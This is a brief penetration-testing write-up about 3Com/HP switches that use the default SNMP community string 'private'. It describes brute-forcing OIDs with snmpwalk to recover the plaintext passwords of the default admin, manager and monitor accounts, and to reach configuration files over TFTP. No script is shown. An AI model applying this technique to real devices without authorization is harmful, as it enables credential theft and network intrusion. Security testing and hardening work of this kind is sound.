During one of our internal network penetration testings, I focused on the network devices. The customer had 3Com/HP switches. Little portscan with NSE revealed that the switches used default SNMP community strings (
private)! I checked SNMP problems affecting 3Com/HP switches; there was a really interesting issue:
I tried to check all the OIDs from
hh3c-user.mib files with no success.
Having tried everything else, the solution was good old brute force (snmpwalk and a shell script):
The screenshot shows the three default accounts on the device: admin, manager, monitor and their plain text passwords.
The SNMP MIB brute force revealed some other interesting information, including configuration files that you could download using the TFTP ;)
What have we learnt today? If a method of attack does not work at first, do not reject it immediately!